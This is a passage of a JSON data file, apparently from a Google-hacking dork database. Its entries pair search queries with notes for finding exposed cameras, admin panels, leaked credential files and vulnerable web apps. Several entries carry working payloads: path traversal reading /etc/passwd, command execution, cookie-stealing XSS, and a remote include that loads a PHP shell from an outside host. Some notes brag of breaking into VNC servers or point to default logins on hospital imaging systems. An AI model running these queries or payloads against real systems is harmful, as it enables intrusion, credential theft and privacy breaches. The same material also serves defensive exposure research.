description": "Linksys wireless G Camera.", "submited": "2005-12-31", "request": "inurl:/img/vr.htm", "id": 1230}, {"short description": "intext:\"Powered by CubeCart 3.0.6\" intitle:\"Powered by CubeCart\"", "long description": "CubeCart is an eCommerce script written with PHP & MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398Moderator note: \"Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke\"", "submited": "2005-12-31", "request": "intext:\"Powered by CubeCart 3.0.6\" intitle:\"Powered by CubeCart\"", "id": 1231}, {"short description": "inurl:ovcgi/jovw", "long description": "An HP Java network management tool. It is a sign that a network may not be configured properly.", "submited": "2005-12-31", "request": "inurl:ovcgi/jovw", "id": 1232}, {"short description": "intitle:Axis inurl:\"/admin/admin.shtml\"", "long description": "similar searchs exist. This search finds a few more results as well as access to the Admin area or a login screen depending on Cameras configuration.", "submited": "2005-12-31", "request": "intitle:Axis inurl:\"/admin/admin.shtml\"", "id": 1233}, {"short description": "DCS inurl:\"/web/login.asp\"", "long description": "Login pages for the DCS-950 Web Camera. Even comes with a built in microphone.", "submited": "2005-12-31", "request": "DCS inurl:\"/web/login.asp\"", "id": 1234}, {"short description": "intitle:\"Dell Laser Printer *\" port_0 -johnny.ihackstuff", "long description": "Dell laser printers. 
This search finds different results that dork id 1077.", "submited": "2006-01-02", "request": "intitle:\"Dell Laser Printer *\" port_0 -johnny.ihackstuff", "id": 1235}, {"short description": "filetype:bak createobject sa", "long description": "This query searches for files that have been renamed to a .bak extension (obviously), but includes a search for the characters \"sa\" (default SQL server admin id) and \"createobject\" which is requisite VBScript for opening some sort of odbc/ado connection. Since the sql id and password are plain text, it's easy to connect to the SQL server once you have this information... especially those that use \"server=127.0.0.1\" so you know IIS & SQL Server are running on the same box.", "submited": "2006-01-01", "request": "filetype:bak createobject sa", "id": 1236}, {"short description": "\"bp blog admin\" intitle:login | intitle:admin -site:johnny.ihackstuff.com", "long description": "betaparticle (bp) blog is blog software coded in asp. This google dork finds the admin logins.", "submited": "2006-01-02", "request": "\"bp blog admin\" intitle:login | intitle:admin -site:johnny.ihackstuff.com", "id": 1237}, {"short description": "inurl:\"editor/list.asp\" | inurl:\"database_editor.asp\" | inurl:\"login.asa\" \"are set\"", "long description": "This search finds CLEARTEXT usernames/passwords for the Results Database Editor. The log in portal can be found at /editor/login.asp. 
At time of submitting there are 21 results.Also a search for the logins:inurl:\"Results/editor/login.asp\"\"Database Editor Login\" \"Results Page\"", "submited": "2006-01-02", "request": "inurl:\"editor/list.asp\" | inurl:\"database_editor.asp\" | inurl:\"login.asa\" \"are set\"", "id": 1238}, {"short description": "ext:passwd -intext:the -sample -example", "long description": "Various encrypted passwords, some plaintext passwords and some private keys are revealed by this search.", "submited": "2006-01-02", "request": "ext:passwd -intext:the -sample -example", "id": 1239}, {"short description": "enable password | secret \"current configuration\" -intext:the", "long description": "Another Cisco configuration search. This one is cleaner, gives complete configuration files and it catches plaintext, \"secret 5\" and \"password 7\" passwords.", "submited": "2006-01-02", "request": "enable password | secret \"current configuration\" -intext:the", "id": 1240}, {"short description": "ext:asa | ext:bak intext:uid intext:pwd -\"uid..pwd\" database | server | dsn", "long description": "search for plaintext database credentials in ASA and BAK files.", "submited": "2006-01-02", "request": "ext:asa | ext:bak intext:uid intext:pwd -\"uid..pwd\" database | server | dsn", "id": 1241}, {"short description": "intext:\"PhpGedView Version\" intext:\"final - index\" -inurl:demo", "long description": "PHPGedView", "submited": "2006-01-02", "request": "intext:\"PhpGedView Version\" intext:\"final - index\" -inurl:demo", "id": 1242}, {"short description": "intext:\"Powered by DEV web management system\" -dev-wms.sourceforge.net -demo", "long description": "DEV cms", "submited": "2006-01-02", "request": "intext:\"Powered by DEV web management system\" -dev-wms.sourceforge.net -demo", "id": 1243}, {"short description": "intitle:\"phpDocumentor web interface\"", "long description": "Php Documentor < = 1.3.0 rc4 remote code xctn dork: intitle:\"phpDocumentor web interface\"advisory & poc 
exploit:http://rgod.altervista.org/phpdocumentor_130rc4_incl_expl.html", "submited": "2006-01-02", "request": "intitle:\"phpDocumentor web interface\"", "id": 1244}, {"short description": "inurl:\"tmtrack.dll?\"", "long description": "This query shows installations of Serena Teamtrack. (www.serena.com).You may be able to adjust the application entry point, by providing a command after the \"tmtrack.dll?\" like thistmtrack.dll?LoginPagetmtrack.dll?View&Template=viewand more.", "submited": "2006-01-04", "request": "inurl:\"tmtrack.dll?\"", "id": 1245}, {"short description": "\"intitle:3300 Integrated Communications Platform\" inurl:main.htm", "long description": "logon portal to the mitel 330 integrated communications platform.[Mitel 3300 Integrated Communications Platform (ICP) provides enterprises with a highly scalable, feature-rich communications system designed to support businesses from 30-60,000 users. ...supporting networking standards such as Q.SIG, DPNSS, and MSDN .... enable their legacy PBX's, ]", "submited": "2006-01-14", "request": "\"intitle:3300 Integrated Communications Platform\" inurl:main.htm", "id": 1246}, {"short description": "intitle:Ovislink inurl:private/login", "long description": "Ovislink vpn login page.", "submited": "2006-01-16", "request": "intitle:Ovislink inurl:private/login", "id": 1247}, {"short description": "intitle:\"::::: INTELLINET IP Camera Homepage :::::\" OR inurl:/main_activex.asp OR inurl:/main_applet.cgi", "long description": "A variation on Jeffball55's original Intellinet Ip Camera.This search finds several more web cams.A suggested secondary search:\"Administrator Menu\" \"camera Name\" \"Location\" \"frame rate\" intitle:network.camera -pdfThanks jeffball.", "submited": "2006-01-16", "request": "intitle:\"::::: INTELLINET IP Camera Homepage :::::", "id": 1248}, {"short description": "filetype:pl intitle:\"Ultraboard Setup\"", "long description": "setup pages to the ultraboard system.", "submited": "2006-01-16", 
"request": "filetype:pl intitle:\"Ultraboard Setup\"", "id": 1249}, {"short description": "inurl:install.pl intext:\"Reading path paramaters\" -edu", "long description": "Excelent information for foot holds. Everything from OS, to forum software, etc. Other exploits possible", "submited": "2006-01-16", "request": "inurl:install.pl intext:\"Reading path paramaters\" -edu", "id": 1250}, {"short description": "inurl:build.err", "long description": "General build error file. Can tell what modules are installed, the OS the compiler the language, in theory usernames and passwords could probably be found too.", "submited": "2006-01-16", "request": "inurl:build.err", "id": 1251}, {"short description": "intext:ViewCVS inurl:Settings.php", "long description": "CVs is a software used to keep track of changes to websites. You can review all updates and previous files wihtout actualy loging into CVS. It is possible to see password files, directory structure, how often is the website updated, previous code find exploits, etc.", "submited": "2006-01-16", "request": "intext:ViewCVS inurl:Settings.php", "id": 1252}, {"short description": "\"Powered by Midmart Messageboard\" \"Administrator Login\"", "long description": "Midmart Messageboard lets you run a highly customizable bulletin board with a very nice user interface (similar to Yahoo Clubs) on your web site in few minutes. Many other features included. Rar found it murfie cleaned it up.", "submited": "2006-01-16", "request": "\"Powered by Midmart Messageboard\" \"Administrator Login\"", "id": 1253}, {"short description": "inurl:install.pl intitle:GTchat", "long description": "Gtchat install file.You can disable the chat program or change the language without a admin username or password. 
You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom.", "submited": "2006-01-16", "request": "inurl:install.pl intitle:GTchat", "id": 1254}, {"short description": "inurl:rpSys.html", "long description": "Web configuration pages for various types of systems. Many of these systems are not password protected.", "submited": "2006-01-22", "request": "inurl:rpSys.html", "id": 1255}, {"short description": "intitle:\"Horde :: My Portal\" -\"[Tickets\"", "long description": "Hi It will give you administrative ownership over Horde webmail system plus all users in Horde webmail system.. also php shell :) and much more ...Edited by CP", "submited": "2006-02-03", "request": "intitle:\"Horde :: My Portal\" -\"[Tickets\"", "id": 1256}, {"short description": "filetype:reg reg +intext:", "long description": "This can be used to get encoded vnc passwords which can otherwise be obtained by a local registry and decoded by cain & abel. The query find registry entries which can otherwise be found can locally in:\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\PasswordIf you are a cain and abel user you'll and have used this feature before you will know how useful this query is. Other than decoded passwords you can also find other useful information on the VNC server and its security. I have successfully gained access to many VNC servers.", "submited": "2006-02-05", "request": "filetype:reg reg +intext:", "id": 1257}, {"short description": "\"Please re-enter your password It must match exactly\"", "long description": "Invision Powerboard registration pages. Plain and simple.", "submited": "2006-02-08", "request": "\"Please re-enter your password It must match exactly\"", "id": 1258}, {"short description": "intext:\"Fill out the form below completely to change your password and user name. 
If new username is left blank, your old one will be assumed.\" -edu", "long description": "The page to change admin passwords. Minor threat but the place to start an attack.", "submited": "2006-02-08", "request": "intext:\"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.\" -edu", "id": 1259}, {"short description": "inurl:CrazyWWWBoard.cgi intext:\"detailed debugging information\"", "long description": "gives tons of private forum configuration information.examples: Global variables installed, what groups the default user, guest and admin belong to, file paths, OS and appache versions, encypted admin password.Also Crazyboard has known vulnerabilities.", "submited": "2006-02-08", "request": "inurl:CrazyWWWBoard.cgi intext:\"detailed debugging information\"", "id": 1260}, {"short description": "intext:\"Welcome to Taurus\" \"The Taurus Server Appliance\" intitle:\"The Taurus Server Appliance\"", "long description": "Celestix Networks, Inc., the premier supplier of network server appliance, announces the Taurus(TM) Server Appliance, the all-in-one networking solution for the small to midsize business. The Taurus(TM) Server Appliance offers no compromise on functionality and scalability, and provides optimum efficiency at a lower price than traditional servers.With a single purchase, up to 250 users have integrated file and peripheral sharing, high-speed Internet access, email, scheduled back-up, VPN and secure firewall, anti-virus engine, and Intranet. Standard with built-in networking software and optimized applications, the Taurus(TM) supplies up to 40-GB of Internal storage. Seperate Admin and root password. Root password must be changed from the command prompt which means most Sysadmins won't change it from Default. 
Manuel hosted by the device no password needed.", "submited": "2006-02-08", "request": "intext:\"Welcome to Taurus\" \"The Taurus Server Appliance\" intitle:\"The Taurus Server Appliance\"", "id": 1261}, {"short description": "inurl:wl.exe inurl:?SS1= intext:\"Operating system:\" -edu -gov -mil", "long description": "List server apparently keeps track of many clients, not just Domains and hardware, but Operating systems as well. As always this information is able to be gained by Zero Packet methods.", "submited": "2006-02-08", "request": "inurl:wl.exe inurl:?SS1= intext:\"Operating system:\" -edu -gov -mil", "id": 1262}, {"short description": "inurl:setdo.cgi intext:\"Set DO OK\"", "long description": "Dcs-2100 camerasBy removing \"intext:Set DO OK\" you will get more hits but they will require a login. Set DO OK is almost always admin access, you will need to go to the root of the URL to use the camera.", "submited": "2006-02-08", "request": "inurl:setdo.cgi intext:\"Set DO OK\"", "id": 1263}, {"short description": "intitle:\"4images - Image Gallery Management System\" and intext:\"Powered by 4images 1.7.1\"", "long description": "Find web app: 4Images = 1.7.1This web app is vulenrable to remote code execution exploit.The url of exploit is this: http://milw0rm.com/id.php?id=1533Good hackingBy HaVoC", "submited": "2006-02-26", "request": "intitle:\"4images - Image Gallery Management System\" and intext:\"Powered by 4images 1.7.1\"", "id": 1264}, {"short description": "\"not for public release\" -.edu -.gov -.mil", "long description": "if you search through lots of these then you find some really juicy things, there files from police, airports, government companies all kind of stuff that is not meant to be seen by normal people.", "submited": "2006-02-22", "request": "\"not for public release\" -.edu -.gov -.mil", "id": 1265}, {"short description": "(intitle:\"metaframe XP Login\")|(intitle:\"metaframe Presentation server Login\")", "long description": "Once you 
input any username, you'll get an error message. Try putting a script with some other fun commands in it. Just send some info off to be logged.If exploited correctly, could give you admin access to a network.", "submited": "2006-02-12", "request": "(intitle:\"metaframe XP Login\")|(intitle:\"metaframe Presentation server Login\")", "id": 1266}, {"short description": "inurl:ids5web", "long description": "EasyAccess Web is a application to view radiological images online.Like in hospitals or universities.Problem is the default administrative login: wadm/wadmBe able to watch sensitive data and images.very bad...", "submited": "2006-02-09", "request": "inurl:ids5web", "id": 1267}, {"short description": "filetype:sql \"insert into\" (pass|passwd|password)", "long description": "Looks for SQL dumps containing cleartext or encrypted passwords.", "submited": "2006-03-06", "request": "filetype:sql \"insert into\" (pass|passwd|password)", "id": 1268}, {"short description": "\"Powered by Simplog\"", "long description": "searches for simplog which has directory traversal and XSS velnerabilites in version", "submited": "2006-03-06", "request": "\"Powered by Simplog\"", "id": 1269}, {"short description": "\"index of /\" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )", "long description": "searches for scripts that let you upload files which you can then execute on the server.", "submited": "2006-03-06", "request": "\"index of /\" ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )", "id": 1270}, {"short description": "inurl:\"/admin/configuration. 
php?\" Mystore", "long description": "simply google inurl trick for Oscommerce for open administrator page.If no .htpassword is set for the admin folder of osCommerce then of course you can change any setting in the shop unless password security has been enabled on the admin console.Despite a few demo pages there are a few open admin pages for webshops.Simple patch if you are one is to place a .htpassword file in the root of the admin folder. -- J.R.Middleton", "submited": "2006-03-07", "request": "inurl:\"/admin/configuration. php?\" Mystore", "id": 1271}, {"short description": "\"powered by sblog\" +\"version 0.7\"", "long description": "please go here for a writeup on the vulnerability.HTML injection.http://www.securityfocus.com/bid/17044", "submited": "2006-03-13", "request": "\"powered by sblog\" +\"version 0.7\"", "id": 1272}, {"short description": "inurl:\"NmConsole/Login.asp\" | intitle:\"Login - Ipswitch WhatsUp Professional 2005\" | intext:\"Ipswitch WhatsUp Professional 2005 (SP1)\" \"Ipswitch, Inc\"", "long description": "Ipswitch Whats Up Monitoring 2005!This is a console for Network Monitoring, access beyond the portal will allow you to do various things, such as telnet to internal machines, reboot servers, gain server information such as IP address.If the Administrators have utilised WUG to its potential, they will have also made full Infrastructure MAPs available. 
Access beyond the portal is Gold Information, you would have access to information and services as if you were an Administrator.In addition, some of the links, allow you to go beyond the portal as a guest user, this still allows reconisance of various servers and details of them, including where they are located physically.For anybody that is interested, the Login Portal has a SQL based Backend.", "submited": "2006-03-13", "request": "inurl:\"NmConsole/Login.asp\" | intitle:\"Login - Ipswitch WhatsUp Professional 2005\" | intext:\"Ipswitch WhatsUp Professional 2005 (SP1)\" \"Ipswitch, Inc\"", "id": 1273}, {"short description": "filetype:asp + \"[ODBC SQL\"", "long description": "This search returns more than just the one I saw already here. This one will return all ODBC SQL error pages including all data returned in the error. The information can range from simple data such as the table/row queried to full Database name etc.An attacker could take this information and use it to gain a foot hold into the SQL server and could use the information for an SQL injection attack.", "submited": "2006-03-13", "request": "filetype:asp + \"[ODBC SQL\"", "id": 1274}, {"short description": "(intitle:\"WordPress Setup Configuration File\")|(inurl:\"setup-config.php?step=\")", "long description": "Alter setup configuration files.add ?step=1", "submited": "2006-03-15", "request": "(intitle:\"WordPress Setup Configuration File\")|(inurl:\"setup-config.php?step=\")", "id": 1275}, {"short description": "intitle:\"Joomla - Web Installer\"", "long description": "Joomla! is a Content Management System (CMS) created by the same team that brought the Mambo CMS. This dork finds the Web Installer page. 
On newer versions, after you install, joomla asks to delete installation dir before to be functional.The Webinstaller gives an attacker information about the php configuration and rgod has even found a way to inject data into the configuration.php file, resulting in a DoS attack (see the forums for more info).The admin logon can be found searching: intitle:\"- Administration [Joomla]\" but there are no default passwords.", "submited": "2006-03-18", "request": "intitle:\"Joomla - Web Installer\"", "id": 1276}, {"short description": "intitle:\"Webview Logon Page\"", "long description": "This is the web interface for Alcatel's Omniswitch. Default login is: admin/switch.", "submited": "2006-03-18", "request": "http://www.google.com/search?q=intitle:%22Webview+Logon+Page%22&filter=0", "id": 1277}, {"short description": "(intitle:\"PRTG Traffic Grapher\" inurl:\"allsensors\")|(intitle:\"PRTG Traffic Grapher - Monitoring Results\")", "long description": "PRTG Traffic Grapher is Windows software for monitoring and classifying bandwidth usage. It provides system administrators with live readings and long-term usage trends for their network devices. The most common usage is bandwidth usage monitoring, but you can also monitor many other aspects of your network like memory and CPU utilizations.", "submited": "2006-03-18", "request": "(intitle:\"PRTG Traffic Grapher\" inurl:\"allsensors\")|(intitle:\"PRTG Traffic Grapher - Monitoring Results\")", "id": 1278}, {"short description": "intitle:\"AR-*\" \"browser of frame dealing is necessary\"", "long description": "A few Sharp printers ..", "submited": "2006-03-18", "request": "intitle:\"AR-*\" \"browser of frame dealing is necessary\"", "id": 1279}, {"short description": "intitle:\"WxGoos-\" (\"Camera image\"|\"60 seconds\" )", "long description": "This is used in serverrooms and such where climate conditions are crucial to hardware health. 
If an attacker were to guess the password for the configuration page, then he can find POP3 passwords in plain text in the HTML source code.It runs on \"I.T. Watchdogs, Inc. Embedded Web Server\"", "submited": "2006-03-18", "request": "intitle:\"WxGoos-\" (\"Camera image\"|\"60 seconds\" )", "id": 1280}, {"short description": "intext:\"you to handle frequent configuration jobs easily and quickly\" | intitle:\"Show/Search other devices\"", "long description": "ELSA DSL lan modems.", "submited": "2006-03-18", "request": "intext:\"you to handle frequent configuration jobs easily and quickly\" | intitle:\"Show/Search other devices\"", "id": 1281}, {"short description": "intitle:\"NAS\" inurl:indexeng.html", "long description": "Disk Online Server NAS device.", "submited": "2006-03-18", "request": "intitle:\"NAS\" inurl:indexeng.html", "id": 1282}, {"short description": "\"Thank You for using WPCeasy\"", "long description": "There is a SQL injection vulnerability in WPC.easy, resulting in full admin access to any remote attacker. Vendor was notified. 
http://www.securityfocus.com/archive/1/425395", "submited": "2006-03-18", "request": "\"Thank You for using WPCeasy\"", "id": 1283}, {"short description": "intitle:\"Skystream Networks Edge Media Router\" -securitytracker.com", "long description": "skystream Networks Edge Media Router.", "submited": "2006-03-18", "request": "intitle:\"Skystream Networks Edge Media Router\" -securitytracker.com", "id": 1284}, {"short description": "intitle:\"Ethernet Network Attached Storage Utility\"", "long description": "Linksys network storage utility.", "submited": "2006-03-18", "request": "intitle:\"Ethernet Network Attached Storage Utility\"", "id": 1285}, {"short description": "intitle:\"GigaDrive Utility\"", "long description": "Linksys GigaDrive network storage utility.", "submited": "2006-03-18", "request": "intitle:\"GigaDrive Utility\"", "id": 1286}, {"short description": "intitle:\"LOGREP - Log file reporting system\" -site:itefix.no", "long description": "Logrep is an open source log file Extraction and Reporting System by ITeF!x. This dork finds the logs that it creates.", "submited": "2006-03-21", "request": "intitle:\"LOGREP - Log file reporting system\" -site:itefix.no", "id": 1287}, {"short description": "inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com", "long description": "RemotelyAnywhere is a program that enables remote control, in the same matter as VNC. Once Logged in an attacker has almost complete control of the computer.", "submited": "2006-03-21", "request": "inurl:2000 intitle:RemotelyAnywhere -site:realvnc.comg", "id": 1288}, {"short description": "\"Web-Based Management\" \"Please input password to login\" -inurl:johnny.ihackstuff.com", "long description": "This dork finds firewall/vpn products from fiber logic. 
They only require a one-factor authentication.", "submited": "2006-03-21", "request": "\"Web-Based Management\" \"Please input password to login\" -inurl:johnny.ihackstuff.com", "id": 1289}, {"short description": "intitle:\"DVR Client\" -the -free -pdf -downloads -blog -download -dvrtop", "long description": "This dork finds digital video recording client from Nuvico.", "submited": "2006-03-21", "request": "intitle:\"DVR Client\" -the -free -pdf -downloads -blog -download -dvrtop", "id": 1290}, {"short description": "\"OK logout\" inurl:vb.htm?logout=1", "long description": "This is a google dork for Hunt Electronics web cams. To get to the cameras remove the vb.htm?logout=1 from the url.", "submited": "2006-03-21", "request": "\"OK logout\" inurl:vb.htm?logout=1", "id": 1291}, {"short description": "intitle:\"Edr1680 remote viewer\"", "long description": "This search finds the 1680 series digital video recorder from EverFocus.", "submited": "2006-03-21", "request": "intitle:\"Edr1680 remote viewer\"", "id": 1292}, {"short description": "inurl:\"vsadmin/login\" | inurl:\"vsadmin/admin\" inurl:.php|.asp -\"Response.Buffer = True\" -javascript", "long description": "Ecommerce templates makes a online shopping cart solution. This search finds the admin login.", "submited": "2006-03-21", "request": "inurl:\"vsadmin/login\" | inurl:\"vsadmin/admin\" inurl:.php|.asp -\"Response.Buffer = True\" -javascript", "id": 1293}, {"short description": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "long description": "Webmail is a http based email server made by atmail.com. To get to the admin login instead of regular login add webadmin/ to the url.", "submited": "2006-03-21", "request": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "id": 1294}, {"short description": "inurl:\"calendarscript/users.txt\"", "long description": "CalenderScript is an overpriced online calender system written in perl. 
The passwords are encrypted using perl's crypt() function which I think DES encrypts things. However if the computer the calender script is on doesn't support the crypt function the are plaintext. Changing calender dates might not sound useful but people reuse passwords so who knows? Also search for the logins:intitle:\"Calendar Administration : Login\" | inurl:\"calendar/admin/index.asp\" -demo -demos Then to get the passwords change the url fromwxw.calendersiteexample.com/thissite/calendar_admin.cgitowxw.calendersiteexample.com/thissite/calendarscript/users.txt The defaults are anonymous/anonymous and Administrator/Administrator.", "submited": "2006-03-21", "request": "inurl:\"calendarscript/users.txt\"", "id": 1295}, {"short description": "intitle:\"EZPartner\" -netpond", "long description": "EZPartner is a great marketing tool that will help you increase your sales by sending webmaster affiliate traffic to your sites. This search finds the logins.", "submited": "2006-03-21", "request": "intitle:\"EZPartner\" -netpond", "id": 1296}, {"short description": "\"Powered by Loudblog\"", "long description": "this dork is for the LoudBlog", "submited": "2006-02-08", "request": "\"Powered by Loudblog\"", "id": 1297}, {"short description": "\"This website engine code is copyright\" \"2005 by Clever Copy\" -inurl:demo", "long description": "Clever Copy", "submited": "2006-02-08", "request": "\"This website engine code is copyright\" \"2005 by Clever Copy\" -inurl:demo", "id": 1298}, {"short description": "intitle:\"b2evo installer\" intext:\"Installer Version\"", "long description": "this page lets you to know some interesting info on target machine, database name, username... 
it lets you to see phpinfo() and, if you know database password, lets you to inject arbitrary code in blogs/conf/_config.php, regardless of magic_quotes_gpc settings and launch commands wrote a simple dictionary attack tool fot this: http://retrogod.altervista.org/b2evo_16alpha_bf.html", "submited": "2006-02-08", "request": "intitle:\"b2evo installer\" intext:\"Installer Version\"", "id": 1299}, {"short description": "\"index of\" intext:fckeditor inurl:fckeditor", "long description": "\"index of\" intext:fckeditor inurl:fckeditor this dork is for FCKEditor scriptthrough editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious contempt on target machine including php code and launch commands... however if you do not succeed to execute the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them... this tool make the dirty work for 2.0 - 2.2 versions: http://retrogod.altervista.org/fckeditor_22_xpl.html", "submited": "2006-02-09", "request": "\"index of\" intext:fckeditor inurl:fckeditor", "id": 1300}, {"short description": "\"powered by runcms\" -runcms.com -runcms.org", "long description": "\"powered by runcms\" -runcms.com -runcms.org all versions", "submited": "2006-02-09", "request": "\"powered by runcms\" -runcms.com -runcms.org", "id": 1301}, {"short description": "(\"This Dragonfly installation was\" | \"Thanks for downloading Dragonfly\") -inurl:demo -inurl:cpgnuke.com", "long description": "exploit and short explaination: http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html", "submited": "2006-02-13", "request": "(\"This Dragonfly installation was\" | \"Thanks for downloading Dragonfly\") -inurl:demo -inurl:cpgnuke.com", "id": 1302}, {"short description": "inurl:docmgr | intitle:\"DocMGR\" \"enter your Username and\"|\"und Passwort bitte\"|\"saisir votre nom\"|\"su nombre de usuario\" -ext:pdf -inurl:\"download.php", "long description": "exploit and 
short explaination: http://retrogod.altervista.org/docmgr_0542_incl_xpl.html", "submited": "2006-02-13", "request": "inurl:docmgr | intitle:\"DocMGR\" \"enter your Username and\"|\"und Passwort bitte\"|\"saisir votre nom\"|\"su nombre de usuario\" -ext:pdf -inurl:\"download.php", "id": 1303}, {"short description": "(intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc", "long description": "exploiting a bug in EGS Enterprise Groupware System 1.0 rc4, I found this dork: (intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc It is related to the installation script of FileSpray 0.9.7, now I'm going to test 0.9.8-9 by now switch to sql/ directory and search the install-0.9.7.php script explaination link: http://retrogod.altervista.org/egs_10rc4_php5_incl_xpl.htmlexploit adjusted for flyspray: http://retrogod.altervista.org/flyspray_097_php5_incl_xpl.html", "submited": "2006-02-13", "request": "(intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc", "id": 1304}, {"short description": "intext:\"LinPHA Version\" intext:\"Have fun\"", "long description": "this is for Linpha", "submited": "2006-02-13", "request": "intext:\"LinPHA Version\" intext:\"Have fun\"", "id": 1305}, {"short description": "inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\"", "long description": "this (evil ) script lets you to upload a php shell on target server, in most cases not password protected dork: inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\" a note: sometimes you don't see a link to a list of uploaded files... 
just switch to http://[target]/[path]/updown.php?action=download", "submited": "2006-02-28", "request": "inurl:updown.php | intext:\"Powered by PHP Uploader Downloader\"", "id": 1306}, {"short description": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "long description": "dork: (\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis software: http://nocc.sourceforge.net/ this is for Nocc Webmail multiple arbitrary local inclusion, multiple xss & possible remote code execution flaws I found: example of arbitrary local inclusion: http://[target]/[path]/html/footer.php?cmd=dir&_SESSION[nocc_theme]=../../../../../../../../../test.php%00 http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=fr&theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=../../../../../../../../../../../../test example of commands execution (including an uploaded mail attachment with php code inside, filename is predictable...) 
http://[target]/[path]/index.php?cmd=dir&lang=../tmp/php331.tmp1140514888.att%00 xss: http://[target]/[path]/html/error.php?html_error_occurred=alert(document.cookie) http://[target]/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie) http://[target]/[path]/html/no_mail.php?html_no_mail=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?page_line=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?prev=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?next=alert(document.cookie) http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=\">alert(document.cookie) full advisory & poc exploit: http://retrogod.altervista.org/noccw_10_incl_xpl.html", "submited": "2006-02-28", "request": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "id": 1307}, {"short description": "intitle:\"igenus webmail login\"", "long description": "intitle:\"igenus webmail login\"example exploit: http://[target]/[path]/?Lang=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/config/config_inc.php?SG_HOME=../../../../../../../../../../etc/passwd%00 also, on php5: http://[target]/[path]/config/config_inc.php?SG_HOME=ftp://username:password@somehost.com&cmd=dir where on somehost.com you have a php shell code in a \".config\" file exploit code: http://retrogod.altervista.org/igenus_202_xpl_pl.html", "submited": "2006-02-28", "request": "intitle:\"igenus webmail login\"", "id": 1308}, {"short description": "allintitle:\"FirstClass Login\"", "long description": "allintitle:\"FirstClass Login\" this is for firstclass directory listingsgo to http://[target]/[path]/Search type just ' in search field and you have a list of downloadable files, you don't see all files on server but you can search for a robots.txt with some folders path or other info for site scructure, crawling in this way you have unauthorized access on all files on the target server", 
"submited": "2006-02-28", "request": "allintitle:\"FirstClass Login\"", "id": 1309}, {"short description": "\"powered by 4images\"", "long description": "this is for 4images", "submited": "2006-02-28", "request": "\"powered by 4images\"", "id": 1310}, {"short description": "intext:\"Powered By Geeklog\" -geeklog.net", "long description": "dork: intext:\"Powered By Geeklog\" -geeklog.net this is for the vulnerability discovered by GulfTech research, related stuff: (*) http://www.gulftech.org/?node=research&article_id=00102-02192006 http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=geeklog&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0 exploit for (*) : http://retrogod.altervista.org/geeklog_1_4_xpl_php_.html (php) http://retrogod.altervista.org/geeklog_1_4_xpl_perl_.html (perl...mphhh)", "submited": "2006-02-28", "request": "intext:\"Powered By Geeklog\" -geeklog.net", "id": 1311}, {"short description": "intitle:admbook intitle:version filetype:php", "long description": "intitle:admbook intitle:version filetype:php tested version: 1.2.2, you can inject php code in config-data.php and execute commands on target through X-FOWARDED FOR http header when you post a message also you can see phpinfo(): http://[target]/[path]/admin/info.phpperl exploit:http://retrogod.altervista.org/admbook_122_xpl.html", "submited": "2006-02-28", "request": "intitle:admbook intitle:version filetype:php", "id": 1312}, {"short description": "WEBalbum 2004-2006 duda -ihackstuff -exploit", "long description": "dork: WEBalbum 2004-2006 duda -ihackstuff -exploitsoftware site: http://www.web-album.org/ advisory/ poc exploit: http://retrogod.altervista.org/webalbum_202pl_local_xpl.html", "submited": "2006-03-28", "request": "WEBalbum 2004-2006 duda -ihackstuff -exploit", "id": 1313}, {"short description": "intext:\"Powered by Plogger!\" -plogger.org -ihackstuff -exploit", "long description": "explaination & exploit: http://retrogod.altervista.org/plogger_b21_sql_xpl.html", 
